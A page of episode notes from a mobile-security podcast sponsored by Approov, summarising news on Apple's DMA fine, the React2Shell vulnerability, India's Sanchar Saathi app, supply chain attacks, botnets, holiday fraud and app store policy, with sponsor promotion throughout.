🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Apple's DMA Non-Compliance: An Open LetterIn this episode of *Upwardly Mobile*, we break down the seismic shift in the mobile app landscape following the European Commission’s decision to formally fine Apple €500 million for breaching the Digital Markets Act (DMA). We explore why regulators view Apple’s recent changes not as genuine adherence to the law, but as "malicious compliance"—a deliberate attempt to technically meet requirements while maintaining control and fees.We also discuss the December 2025 Open Letter sent by app developers to EU President Ursula von der Leyen, which argues that Apple’s new 20% commission on external transactions continues to violate the law and stifle fair competition. Finally, we contrast the situation in Europe with recent US court rulings involving Epic Games, where judges have ordered Apple to stop charging for services it doesn't provide, raising the question: Why are European developers getting a worse deal?.Key Topics Discussed:*   **The €500M Fine:** The European Commission found Apple in breach of "anti-steering" obligations, restricting developers from directing users to cheaper offers outside the App Store.*   **"Malicious Compliance":** An analysis of how Apple’s fee structures and "scare screens" are viewed by critics and regulators as structural impediments to the DMA’s goals.*   **The Meta Connection:** A look at the parallel €200M fine imposed on Meta regarding their "pay or consent" model.*   **The Developer Pushback:** Insights from the "CleanV2" Open Letter, where developers demand the removal of new commission fees that range up to 20%.*   **Transatlantic Tensions:** How the US Ninth Circuit Court of Appeals ruling regarding Epic Games highlights disparities in global enforcement.**Sponsor:**This episode is brought to you by **Approov**.Securing mobile apps is hard; Approov makes it easy. Ensure your APIs are only accessed by genuine instances of your mobile app and block scripts, bots, and modified apps.**Visit: [https://approov.io](https://approov.io)****Resources & Source Materials:***   **European Commission Press Release:** Details on the April 2025 fine regarding Apple’s anti-steering practices.*   **Kluwer Competition Law Blog:** "The DMA's Teeth: Meta and Apple Fined by the European Commission" by Alba Ribera Martínez.*   **Clean App Foundation Open Letter:** The December 2025 appeal to the European Commission regarding Apple's persistent non-compliance.*   **Analysis of US Rulings:** Context on the Epic Games vs. Apple court case and fee limitations.Digital Markets Act, DMA, Apple Fine, App Store Fees, Anti-Steering, Malicious Compliance, European Commission, Margrethe Vestager, Sideloading, Epic Games, Mobile App Security, Tech Policy, Antitrust.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Chinese Hackers & the React2Shell CrisisThis week, we dive deep into the critical, maximum-severity security flaw known as React2Shell (tracked as CVE-2025-55182). This vulnerability, which impacts React, the widely-used open-source JavaScript library, allows for unauthenticated remote code execution (RCE) through specially crafted HTTP requests on affected servers. The episode explores the immediate aftermath of the disclosure. Exploitation attempts began quickly, with Amazon Web Services (AWS) reporting that multiple China-linked threat groups, specifically Earth Lamia and Jackpot Panda, were exploiting the flaw within hours of its public availability. These actors are using both automated tools and individual exploits, and some are even actively debugging and refining their techniques against live targets. Earth Lamia has been active since at least 2023, targeting various industries in Latin America, the Middle East, and Southeast Asia, while Jackpot Panda focuses on cyberespionage operations in Asia. We also discuss the significant collateral damage caused by the urgent need to patch this flaw. Internet infrastructure giant Cloudflare experienced a widespread global outage, returning "500 Internal Server Error" messages worldwide, and attributed the incident to an emergency patch deployed to mitigate the industry-wide React2Shell vulnerability. This change was related to how Cloudflare’s Web Application Firewall parsed requests. Finally, we clarify the scope of the vulnerability: React2Shell primarily impacts server-side components. Specifically, it affects React versions 19.0, 19.1.0, 19.1.1, and 19.2.0, particularly instances using a relatively new server feature. Standard React Native mobile apps are generally safe, but any backend built using Next.js (App Router) or React 19 Server Components that communicates with the mobile app is at critical risk. Furthermore, developers need to be aware of a separate, but timely, vulnerability (CVE-2025-11953) affecting the local React Native CLI development server. Key Concepts and TakeawaysVulnerability: React2Shell, CVE-2025-55182, is a critical vulnerability allowing unauthenticated remote code execution on affected servers.Scope: Impacts the React open-source JavaScript library, particularly React version 19 and dependent React frameworks such as Next.js (App Router). Cloud security giant Wiz reported that 39% of cloud environments contain vulnerable React instances.Threat Actors: Exploitation is linked to China-linked threat groups, including Earth Lamia and Jackpot Panda.Major Impact: An emergency mitigation patch designed to address React2Shell caused a widespread global outage at Cloudflare.Fix: Patches were available shortly after disclosure, reported to Meta on November 29 and patched on December 3. Users must upgrade affected dependencies like react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack to version 19.0.1 or higher.Resources and LinksSecurityWeek (Source Context): (Note: Specific articles discussed are embedded within the episode content.)Expo Changelog: For specific SDK patch instructions.Sponsor Link: Protecting mobile app integrity against security threats is vital: approov.ioKeywords (Optimized for SEO) React2Shell, , Remote Code Execution (RCE), China-linked hackers, Earth Lamia, Jackpot Panda, React Server Components (RSC), Next.js vulnerability, React 19 security, web security, patch management, cyber espionage, critical vulnerability, application security🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Sanchar Saathi: The Mandatory Cyber Safety App Triggering India's Surveillance FirestormIn this critical episode of "Upwardly Mobile," we dive into the escalating controversy surrounding India's Sanchar Saathi app, a government-mandated digital tool that is fueling a nationwide debate over state surveillance and digital privacy. Designed as a citizen-centric safety tool to combat telecom fraud and track lost or stolen devices using their unique IMEI, the app has been lauded by the government for its success in blocking millions of fraudulent connections and stolen phones. However, a recent directive mandating its pre-installation on all new smartphones sold in India has drawn fierce criticism from privacy advocates, opposition politicians, and major tech firms. What You Will Learn in This Episode: The Core Conflict: Safety vs. SnoopingThe Mandate: The Indian telecom ministry privately ordered all smartphone manufacturers to preload Sanchar Saathi on new devices within 90 days, requiring the app to be "visible, functional, and enabled" upon first setup. This directive could eventually roll out the app to more than 735 million existing phone users via software updates.Government Defense: Officials state the app is strictly for cyber security and curbing the "serious endangerment" caused by IMEI tampering, promising adequate security for personal information. They also claim the app is optional and does not read private messages.Surveillance Fears: Privacy experts and the political opposition argue the mandate is unconstitutional and creates a massive surveillance surface area. Opposition leaders have even compared the move to 'Pegasus'.Technical Deep Dive into Privacy RisksThe Sanchar Saathi app requests a range of "dangerous" or "high-risk" permissions.The app has the capability to read call logs and all incoming SMS, technically allowing it to parse bank transaction alerts, 2FA codes, and map a user's social graph.It accesses device identifiers, binding a user's identity to the hardware IMEI, which breaks standard rules for resettable identifiers and aids tracking.If pre-installed as a system-level application (the proposed state), experts warn that permissions could be auto-granted without user consent, the app could run continuous background services, and it would be virtually impossible for 99% of users to uninstall.The privacy policy is weak, lacking explicit mechanisms for data deletion, correction, or a clear opt-out feature.Industry ResistanceTech giants were given 90 days to comply with the pre-installation mandate.Apple has specifically resisted the mandate, citing concerns over privacy and system security, as iPhones require explicit user confirmation for permissions and prevent automatic background registration.The mandate is technically easier to implement on Android devices, which make up over 95% of the Indian smartphone market.Keywords Sanchar Saathi, India digital privacy, state surveillance, government mandate, telecom fraud, cyber safety app, IMEI tracking, pre-installation controversy, Android security, iOS privacy, Apple resistance, call log permissions, data deletion rights, digital rights, Indian politics.Digital Autonomy and the Sanchar Saathi AppLink 1: https://indianexpress.com/article/explained/explained-sci-tech/telecom-scindia-sanchar-saathi-optional-key-concerns-10397728/Link 2: https://www.ndtv.com/india-news/sanchar-saathi-communications-ministry-jyotiraditya-scindia-big-brother-or-cybersafety-boost-deep-dive-into-sanchar-saathi-app-9735477Link 3: https://indianexpress.com/article/technology/tech-news-technology/sanchar-saathi-app-preinstalled-android-ios-privacy-security-concerns-10397922/Link 4: https://www.bbc.com/news/articles/cedxyvx74p4oLink 5: https://www.reuters.com/sustainability/boards-policy-regulation/what-is-indias-politically-contentious-sanchar-saathi-cyber-safety-app-2025-12-02/Sponsor This episode is brought to you by Approov Mobile Security, helping developers secure their mobile APIs and prevent reverse engineering and unauthorized data access.Sponsor Website: approov.io🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Supply Chain Security Unpacked: Combating Dependency Confusion, Poisoned PipelinesEpisode Notes: The software supply chain, the "backbone of modern software development," is under unprecedented assault, with attacks aimed at libraries and development tools soaring by an astounding 633% year-over-year. This episode explores the evolution of supply chain threats, examining everything from software vulnerabilities and malicious maintainers to hidden risks lurking in hardware and commercial binaries, and details the cutting-edge defenses developers are deploying to fight back. The Evolving Threat Landscape: Implicit Trust Exploited Modern attacks exploit the implicit trust developers place in package managers and public repositories. Key threats discussed include:Dependency Confusion: First identified by Alex Birsan, this attack exploits package managers that prioritize packages found in public repositories (especially those with a higher version number) over identically named private packages. Attackers use reconnaissance to pinpoint internal package names (often by examining manifest files like package.json), publish a malicious package with the same name and a higher version to a public repository, and wait for the target application's build process to pull and execute the malicious code. Vectors for this attack include exploiting namespaces, DNS Spoofing, and manipulating CI/CD security settings.Widespread Malware and Stolen Secrets: The npm ecosystem was recently hit by the self-replicating "Shai-Hulud" worm, which compromised over 500 packages and harvested sensitive credentials, including GitHub Personal Access Tokens (PATs) and API keys for cloud services like AWS, GCP, and Microsoft Azure. Stolen credentials remain a reliable attack vector, leading to incidents where attackers published malicious code on behalf of trusted entities (e.g., Nx, rspack).Poisoned Pipelines and Malicious Maintainers: Highly sophisticated attackers are compromising build and distribution systems directly, bypassing code reviews. This includes notorious attacks like SolarWinds and compromises targeting GitHub Actions pipelines (e.g., Ultralytics and reviewdog/actions-setup). Furthermore, the XZ Utils backdoor highlighted the risk of malicious maintainers who build trust over years before inserting sophisticated backdoors into critical open-source projects.Code Rot and Vulnerable Open Source: A survey of popular open-source packages found them rife with vulnerabilities, with an average of 68 vulnerabilities across 30 packages scanned, including many critical and high-severity flaws. Even actively maintained, high-traffic packages like Torchvision contained dozens of vulnerabilities, despite frequent updates.Defense and Verification: Making Trust Explicit To counter these escalating threats, the industry is focusing on making trust assumptions explicit and verifiable:Supply-chain Levels for Software Artifacts (SLSA): SLSA is a security standard that helps consumers verify the process by which an artifact was created using a signed provenance file. Achieving Level 3 compliance involves stringent build platform hardening to prevent the forgery of provenance files.Trusted Publishing and Attestations: Platforms like PyPI have implemented Trusted Publishing, which removes the need for developers to manage long-lived API tokens by utilizing short-lived OIDC tokens issued by the build platform. Building on this, digital attestations (driven by PEP 740) cryptographically bind published packages to their build provenance using Sigstore.CI/CD Security Tools: Tools like Zizmor perform static analysis for GitHub Actions to flag subtle vulnerabilities like template injection or dangerous triggers. Capslock is an experimental tool used for Go language packages that statically identifies capabilities (like network access or file system operations), allowing developers to verify what code can actually do, regardless of where it came from.Preventing Confusion: Developers can mitigate Dependency Confusion through strict naming conventions, proactively reserving namespaces (or "namesquatting" on platforms like PyPI), utilizing private package repositories with stringent access controls (RBAC/MFA), and enforcing package whitelisting and version locking using files like package-lock.json.Verifying Commercial Binaries: Risks also lurk in closed-source commercial software ("black-box" binaries). The compromise of Justice AV Solutions (JAVS) demonstrated how malware (RustDoor) can be implanted in a backdoored installer; sophisticated tools like differential analysis are necessary to detect signs of tampering and unvetted files (such as the typosquatted ffmepg.exe). Organizations must adopt a "Don't Trust, but Verify" approach to all software received from suppliers.The Future of Vulnerability Management: The cybersecurity community is moving beyond sole reliance on CVEs, especially following the NVD backlog experienced in 2024. Comprehensive security now requires visibility into threats like malware, tampering, secret leaks, and lack of hardening, rather than just known vulnerabilities. NIST SP 800-204D outlines crucial strategies for integrating SSC security measures—including generating provenance data—into DevSecOps CI/CD pipelines.Relevant Links and Resources:Learn more about Dependency Confusion Prevention and DevSecOps Orchestration: approov.comNIST SP 800-204D: Strategies for the Integration of Software Supply Chain Security in DevSecOps CI/CD Pipelines: https://doi.org/10.6028/NIST.SP.800-204DKeywords: Software Supply Chain Security, Dependency Confusion, Hardware Trojan, SLSA Framework, CI/CD Pipeline Security, DevSecOps, Trusted Publishing, PyPI, npm, Zizmor, Build Provenance, Side-Channel Attacks, Malware, Cryptojacking, NVD Backlog, Digital Attestations, Zero Trust. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

The Multi-Terabit Battlefield: How Aisura 'Turbo Mirai' Botnet Reshaped Mobile DDoS WarfareOn November 18, 2025, a massive Cloudflare service interruption took down major platforms worldwide, including X, ChatGPT, Shopify, and various critical transit services. Given the intense, ongoing cyber conflict, initial speculation immediately pointed toward a successful, hyper-volumetric Distributed Denial-of-Service (DDoS) attack. Cloudflare has recently been at the forefront of blocking unprecedented assaults from notorious botnets, including Mirai and the newer, "TurboMirai-class" Aisuru botnet. The company successfully mitigated record-breaking Mirai-variant attacks measured at 5.6 Tbps (October 2024) and 7.3 Tbps (May 2025). Furthermore, the Aisuru botnet, which is responsible for hitting Microsoft Azure with a 15.72 Tbps DDoS attack, was also linked to a 22.2 Tbps attack mitigated by Cloudflare in September 2025. Aisuru operators were even caught attempting to manipulate Cloudflare’s public domain rankings using malicious query traffic. This track record provided a clear motive for a potential reprisal. However, Cloudflare’s official investigation quickly dispelled fears of a successful cyberattack. Cloudflare CTO Dane Knecht confirmed that the incident was not an attack, but rather an internal issue. The cause was identified as a "latent bug" in a service underpinning Cloudflare’s bot mitigation capability that started to crash following a routine configuration change. This technical flaw cascaded into a broad degradation across the network. Cloudflare CEO Matthew Prince later noted that this was the worst outage the company had experienced since 2019. This incident highlights that while automated security platforms like Cloudflare can defend against 20+ Tbps DDoS attacks, they remain vulnerable to complex internal technical flaws and configuration management errors. Keywords Cloudflare outage, DDoS, Aisuru Botnet, Mirai, Configuration error, Latent bug, Dane Knecht, November 2025, IoT security, Incident Response, Cyberattack, Network Security, Cloud Security.Hashtags       #ConfigurationManagement #IncidentResponse #CloudSecurity #IoT Related Links & Sources To read more about the incident and the cyber threat landscape, please refer to the following:Cloudflare Outage Not Caused by Cyberattack (SecurityWeek):Microsoft: Azure hit by 15 Tbps DDoS attack using 500,000 IP addresses:Cloudflare’s official report on the November 18, 2025 outage:Discussion on the configuration file bug:TurboMirai-Class ‘Aisuru’ Botnet Blamed for 20+ Tbps DDoS Attacks:Sponsor Message Today’s episode is brought to you by Approov. In an era where botnets like Aisuru are exploiting every vulnerability, securing your APIs and endpoints is paramount. Approov provides essential mobile app and API protection, ensuring that only trusted, legitimate clients can connect to your back-end services, providing a crucial layer of defense against sophisticated automated attacks. Learn more about protecting your mobile infrastructure at approov.com.🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Black Friday's Hidden Threat: Stopping AI-Powered Fraud and Mobile Commerce Exploits The biggest shopping days of the year—Black Friday and Cyber Monday—have also become the prime hunting grounds for cybercriminals, with global financial losses from attacks predicted to hit $10 billion in 2024. In this episode, we dive deep into the rising statistics shaping financial cybersecurity during the holiday shopping season, focusing on how sophisticated, AI-driven scams and mobile app vulnerabilities are creating a perfect storm for retailers and consumers alike. Episode Highlights: The State of Financial Cybercrime Cybercriminal activity spikes by 70% during Black Friday compared to regular shopping days. Statistics show that cyberattacks during this period were projected to rise by 20% in 2024, following a 15% increase in 2023. Key Threats and Data:The Rise of Fake Shops: Scammers are evolving at an unprecedented pace, using AI to generate persuasive copy and fully functional storefront templates that mimic legitimate communication flawlessly. A recent analysis found a 250% jump in fake Black Friday shops leading up to the sales weekend.Targeting E-commerce: E-commerce platforms experience a 65% surge in phishing attacks. Phishing scams remain the most common threat, accounting for 42% of attacks on financial transactions during the 2023 holiday shopping period.Prevalent Fraud Types: Financial institutions report detecting 30% more fraudulent transactions during Cyber Monday. Card-not-present fraud was the leading method used by cybercriminals in 2023, accounting for over 75% of online fraud cases. Credential stuffing incidents surged by 80% during Cyber Monday in 2023, affecting over 40 million accounts globally.The Cost: Financial fraud cases during holiday shopping periods account for nearly $8.5 billion annually. Small and medium-sized businesses (SMBs) are highly vulnerable, reporting an average loss of $120,000 per cyberattack.The Mobile Frontline: While many focus on suspicious websites, the true cybersecurity frontline for e-commerce is increasingly within mobile apps. Attacks on mobile apps used for shopping increased by 50% in 2023, often involving malicious app clones. Attackers exploit vulnerabilities like Man-in-the-middle (MitM) attacks intercepting API traffic and extracting API keys reverse-engineered from app binaries. Standard defenses like TLS encryption and certificate pinning offer necessary but incomplete protection. Industry Response: Financial institutions are bolstering security by integrating biometric authentication into 50% of mobile banking apps, adopting real-time transaction monitoring (reducing fraud by 40%), and using tokenization technology in 65% of online transactions. Furthermore, Zero Trust architecture is gaining traction, with 55% of organizations adopting it to secure financial systems. Sponsor Spotlight This episode is brought to you by Approov, the mobile security platform addressing vulnerabilities where they start: the mobile API. Approov provides a pragmatic defense-in-depth approach by ensuring that only genuine, unmodified apps connect to your backend. Approov neutralizes Black Friday exploits by using dynamic attestation to verify app integrity, and protects against API key theft by delivering short-lived, attested tokens at runtime, preventing API keys from residing within the app binary. Protect your mobile commerce from sophisticated fraud. Learn more about Approov's Mobile API Protection:approov.comRelevant Source Links For more information and detailed statistics referenced in this summary:Financial Cybersecurity Statistics for Black Friday and Cyber Monday 2025 (via CoinLaw): [Link to CoinLaw Article]Online scams skyrocket before Black Friday – NordVPN warns what shoppers should watch out for (via TechRadar): [Link to TechRadar Article]Black Friday Fraud: The Hidden Threat in Mobile Commerce Keywords & Hashtags (SEO Optimized) Keywords: Black Friday, Cyber Monday, cybersecurity statistics, financial fraud, e-commerce security, mobile commerce, API protection, card-not-present fraud, phishing scams, ransomware, credential stuffing, AI-powered scams, fake shops, Approov, NordVPN, retail cybercrime, tokenization, Zero Trust. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

In this pivotal episode of Upwardly Mobile, we dive into the significance of X (formerly known as Twitter) joining the Coalition for App Fairness (CAF). This move signals growing momentum in the global effort to reform the mobile app ecosystem, currently dominated by Apple and Google, whose practices are alleged to harm consumers and developers alike. We examine X's commitment to dismantling monopolistic practices and fostering a digital future where competition thrives and innovation is rewarded. Furthermore, we discuss the context of this fight, including the recent U.S. Department of Justice (DOJ) antitrust complaint filed against Apple. CAF asserts that Apple’s alleged illegal conduct—including abusing App Store guidelines to increase prices and choke off competition—must be addressed, urging Congress to pass legislation like the Open App Markets Act. Tune in to understand how companies are pushing back against the "shackles on developers" to create a level playing field for the more than 80 members of this independent nonprofit organization. Discussion PointsDismantling Monopolies: X’s Head of Global Government Affairs stated that joining CAF is a testament to their commitment to dismantling monopolistic practices and building a mobile ecosystem that truly serves its users and fosters growth.The Problem with Gatekeepers: The current mobile app ecosystem is dominated by Apple and Google, who use their power to harm developers and users through excessive costs and restrictions on innovation. Global Policy Counsel for CAF noted that businesses on platforms like X are harmed by these anticompetitive app store practices.The Antitrust Fight: The DOJ, along with 16 attorneys general, filed an antitrust complaint against Apple, accusing the company of illegally monopolizing smartphone markets. CAF supports this strong stand against Apple’s "stranglehold over the mobile app ecosystem".The Path Forward: CAF advocates for legislation, like the Open App Markets Act, to create a free and open mobile app marketplace and put an end to the anticompetitive practices of all mobile app gatekeepers.About CAF: The Coalition for App Fairness is an independent nonprofit organization focused on protecting consumer choice, fostering competition, and creating a level playing field for app and game developers globally.Approov Sponsored Segment:  The increasing regulatory and commercial pressures are weakening app store monopolies. As the mobile ecosystem decentralizes, the need for robust, independent security is crucial. Our sponsor, Approov, provides strong, app-centric security solutions that operate independently of basic app store protections. Approov helps mobile app developers reduce security dependencies on app stores by delivering runtime protection and attestation for mobile apps and their APIs, shielding against tampering and unauthorized access. Approov’s approach decentralizes security, ensuring developers are not limited by the basic security checks provided by Apple, Google, or any third-party app store (especially relevant as regulations like the EU DMA take effect). Key security features include:Dynamic Certificate Pinning: Secures connections against man-in-the-middle attacks and allows instant over-the-air (OTA) updates without requiring republishing through app stores.Just-in-Time Secrets Management: API keys and secrets are removed from the app and delivered only to verified app instances, protecting against reverse engineering and credential scraping attempts.Run-time Application Self-Protection (RASP): Provides real-time shielding against threats like OS manipulation or hostile frameworks, regardless of how or where the app is distributed, including alternative app stores.This ability to deliver critical updates and security policies directly from Approov’s cloud platform ensures the quickest possible response to threats, bypassing store-mediated app updates.Keywords  X, Twitter, Coalition for App Fairness (CAF), Mobile App Ecosystem, App Store Monopolies, Antitrust, Apple Antitrust, Google Play Store, Developer Freedom, App Competition, Open App Markets Act, Approov, App Security, API Protection, Runtime Protection, App Attestation, EU DMA.       Relevant LinksX Joins CAF Announcement: [Link to source (though the specific URL is not provided in the excerpts, we reference the content that would link to this news)]CAF Mission & Membership: appfairness.orgDOJ Antitrust Complaint Context: [Link to source (though the specific URL is not provided in the excerpts, we reference the content)]Sponsor Approov: Secure your mobile apps independently of app stores at approov.comApproov Security Details:How Approov Works: [Link to source]Approov vs. Mobile App Hardening: [Link to source]Approov's Role in a Post-DMA Landscape: [Link to source and]🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Standing Up to Extortion: Lessons from the Checkout.com Breach and the Rise of Vishing Attacks DescriptionThis week on Upwardly Mobile, we dive deep into the tactics of the prolific criminal group ShinyHunters and explore how global enterprises are responding to sophisticated cyber extortion attempts in 2025. We analyze two major security incidents that highlight critical vulnerabilities in legacy systems and modern OAuth ecosystems. The Extortion Dilemma: Checkout.com Stands FirmWe detail the incident where Checkout.com was contacted by ShinyHunters, who demanded a ransom after gaining unauthorized access to a legacy, third-party cloud file storage system. This system was used in 2020 and prior years for internal operational documents and merchant onboarding materials, affecting less than 25% of their current merchant base. Critically, the threat actors did not access merchant funds or card numbers, and the live payment processing platform was not impacted. Checkout.com publicly stated they would not be extorted and refused to pay the ransom. Instead, they are turning this attack into an investment for the entire security industry by donating the ransom amount to Carnegie Mellon University and the University of Oxford Cyber Security Center to fund cybercrime research. The company accepted full responsibility for the legacy system not being properly decommissioned. The 2025 OAuth and Vishing Wave The episode also examines ShinyHunters' 2025 campaign targeting mobile and web-based enterprise applications, particularly those connected to Salesforce and integrated platforms like Salesloft and Drift. These attacks were characterized by sophisticated social engineering and voice phishing ("vishing"), where attackers impersonated IT staff (sometimes using AI-generated voices) to persuade employees to authorize malicious versions of Salesforce tools via mobile or web apps. By exploiting OAuth tokens, ShinyHunters compromised sensitive internal APIs and data from high-profile victims, including Google, Cloudflare, Qantas, Allianz Life, and Adidas. Analysts noted that these techniques bypassed technical controls by abusing human trust, enabling the theft of over 1.5 billion Salesforce records from approximately 760 organizations. These incidents underscore that modern mobile application security is deeply dependent on robust cloud and OAuth ecosystem safeguards. Sponsor This episode of Upwardly Mobile is brought to you by approov.io, helping protect your mobile API access and application endpoints from sophisticated attacks like those utilizing stolen OAuth tokens.Sponsor Link: approov.ioKeywords: ShinyHunters, Cyber Extortion, Ransomware, Legacy System Vulnerability, OAuth Exploitation, Vishing, Voice Phishing, Salesforce Security, Checkout.com, Cybercrime Research, Cloud Security, Supply Chain Attack, Mobile Application Security, Digital Economy Security, Data Breach.Relevant Source Materials and LinksCheckout.com’s official statement on the incident concerning a legacy system and their decision not to pay the ransom, authored by Mariano Albera.ShinyHunters Salesforce Cyberattacks via Vishing and OAuth ExploitationThe Hackernews: Why the ShinyHunters Data Breach vs. SaaS highlights vulnerabilitiesTrueSec: Cyber extortion group ShinyHunters targets Salesforce customersCM Alliance: Reports on major cyberattacks and data breaches in September 2025EclecticIQ: Analysis of ShinyHunters' financially motivated data extortion group targeting enterprise cloud applicationsReSecurity: Examining the alliance of threat actors and their global cybercrime spreeObsidian Security: The merger of chaos between ShinyHunters and Scattered Spider in the 2025 Salesforce attacksCysecurity News: Coverage of ShinyHunters’ voice phishing attacksReliaQuest: Threat spotlight on ShinyHunters targeting Salesforce amid collaboration with Scattered SpiderCloudProtection: Reporting on Salesforce attacks in 2025PKWARE: Recent Data Breaches🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Remote Attestation vs. RASP: Securing Mobile APIs at the Edge (Zscaler vs. Approov/Cloudflare) On this episode of Upwardly Mobile, we dive deep into the most critical architectural debate in mobile API security today: Does security enforcement belong on the client device (RASP) or off-device at the network edge (Remote Attestation)? We break down the philosophical and technical differences between the integrated Zscaler ZSDK approach, which bundles Runtime Application Self-Protection (RASP), and the specialized, edge-native partnership between Approov and Cloudflare. Discover why security experts argue that because the attacker ultimately controls the client environment, remote attestation is superior for defense against sophisticated, targeted attacks. Episode Highlights & Key Concepts The Philosophical Divide: RASP vs. Remote Attestation The core of the debate centers on where security decision logic is insulated.RASP (Runtime Application Self-Protection): This approach implements security logic within the application code to detect threats locally during runtime, often used for real-time overlay fraud, app tampering, and emulator abuse detection.The Risk: Any locally enforced logic provides a target for advanced adversaries. Attackers can potentially reverse-engineer RASP checks and bypass local controls to execute API requests from a tampered application instance.Remote Attestation (Approov/Cloudflare): This specialized approach verifies that only a genuine, untampered app can access APIs, protecting backend systems from unauthorized or rogue applications.Superior Resilience: Approov’s architecture minimizes local enforcement, ensuring attestation decisions are made entirely in the cloud service. This insulates the enforcement logic on the backend, offering superior resilience against sophisticated, targeted attacks.Zero Feedback Loop: A key security advantage is that the attacker receives no feedback from the client on why the token validation failed at the edge, significantly raising the cost and complexity of a successful attack bypass.Architectural and Operational Advantages The comparison between the integrated Zscaler Zero Trust Exchange (ZTNA/SSE) model and the Approov/Cloudflare Edge-First (WAAP) model highlights major differences in deployment, performance, and operational cost.Enforcement Location and TCO: The Approov/Cloudflare model focuses enforcement entirely at the Cloudflare edge using serverless functions (Workers or API Shield). This is described as a zero-operations deployment model that removes the need for customer-managed infrastructure components like Zscaler’s required App Connectors. The serverless model accelerates time-to-value and minimizes maintenance overhead.API Key Protection: Approov provides a critical security layer by leveraging attestation guarantees to securely deliver secrets, such as API keys, just-in-time to the application only when the environment is verified as genuine and unmodified. This capability directly mitigates the risks associated with reverse engineering hard-coded keys.Performance and Scale: The Cloudflare/Approov integration leverages Cloudflare’s global, high-performance network. Comparative tests show Cloudflare is significantly faster than Zscaler in various Zero Trust scenarios, a crucial factor for a smooth user experience and ensuring users don't bypass security controls. Furthermore, Approov offers a commercial attestation fabric built for scale, guaranteeing no quotas or throttling on attestation traffic for high-volume apps.API Governance: Cloudflare API Shield enhances protection with rigorous positive security via OpenAPI schema validation at the edge. This preemptively guards against modern API security risks like Broken Object Level Authorization (BOLA) by ensuring that only traffic conforming to the documented API structure is accepted.Secure Your Mobile APIs with the Industry's Leading Attestation Solution This episode is proudly brought to you by Approov, the definitive solution for continuous and deterministic mobile app attestation. Approov ensures that only genuine, untampered instances of your mobile application can access your backend APIs, protecting against bot attacks, API abuse, and sophisticated tampering. Learn how to deploy mobile API security today: 🔗 https://approov.io/ Keywords: Mobile API Security, Remote Attestation, RASP, Approov, Cloudflare, Zscaler, API Integrity, Mobile App Protection, Zero Trust Architecture, Edge Security, API Abuse Prevention, Serverless Security, JWT Attestation, Mobile Bot Mitigation, Cloudflare Workers, App Attestation. 🎙️ Upwardly Mobile is hosted by Skye & George. 🛡️ Sponsored by Approov: The only comprehensive solution for mobile app and API security. 👉 Subscribe & Review: Upwardly Mobile | PodcastThis episode includes AI-generated content.

Upwardly Mobile: Episode Notes Episode Title: App Store Revolution: Google Play Opens to Third-Party Payments (The Epic Games Aftermath) Summary: In this episode of Upwardly Mobile, we break down the monumental shift in the Android ecosystem following the Supreme Court’s refusal to hear Google's final appeal. Google has finally opened its Google Play app store to third-party payment options for U.S. developers, settling a multi-year legal battle initiated by Epic Games. We discuss what this means for developers seeking to maximize revenue, the new freedom to direct users to cheaper external payment options, and the resulting challenges in maintaining app integrity and security now that developers are operating outside Google Play Billing exclusivity. Plus, we explore crucial security solutions, like Approov, that can help developers protect their apps when relying less on Google Mobile Services (GMS) for integrity checks. Key TakeawaysPolicy Shift: Following years of legal challenges, Google is now required to allow U.S. app developers to use alternative payment methods and link users directly to external payment sources. This means developers can process payments outside of Google’s ecosystem and inform users about alternative pricing.End of Exclusivity: Previously, Google generally mandated the use of Google Play Billing and collected a commission on nearly every in-app purchase. Now, developers can provide direct links to external checkout pages and offer options like PayPal or their own payment systems.Timeline and Scope: This change became effective immediately as of October 29, 2025. However, the new rules currently apply only in the U.S. and the District Court order is set to expire on November 1, 2027.Security Challenges: While developers gain freedom and potential revenue maximization by avoiding Play Store commissions, distributing and processing payments externally requires implementing their own robust security, update, and analytics systems, as Play services like integrity verification may not be available.App Attestation Alternative: For developers building non-GMS Android apps or those seeking customizable security outside of Google’s structure, Approov provides a solution. Approov is a runtime application self-protection (RASP) tool that offers app attestation—verifying the integrity and authenticity of an app and the device it runs on—without relying on Google PlayIntegrity or SafetyNet.Sponsored by Approov Protect your app and APIs regardless of your payment processing choices. Approov offers comprehensive runtime application self-protection (RASP) and serves as a reliable, GMS-independent alternative to Google PlayIntegrity for robust app attestation and real-time threat detection. Learn more or start a free trial today: approov.io Relevant Links & ResourcesGoogle Opens App Store to Third-Party Payment Systems (PaymentsJournal): https://www.paymentsjournal.com/google-opens-app-store-to-third-party-payment-systems/Google Play now allows Android apps to use other billing systems in the US (9to5Google): https://9to5google.com/2025/10/30/google-play-now-allows-android-apps-to-use-other-billing-systems-in-the-us/How Organizations Can Chart the Course to Agentic Commerce (Must Read): [Relevant link to PaymentsJournal content on commerce] (October 31, 2025)Keywords Google Play, third-party payments, Epic Games, app store, commission, app security, app attestation, Approov, U.S. court ruling, Google Play Billing, non-GMS apps, developer 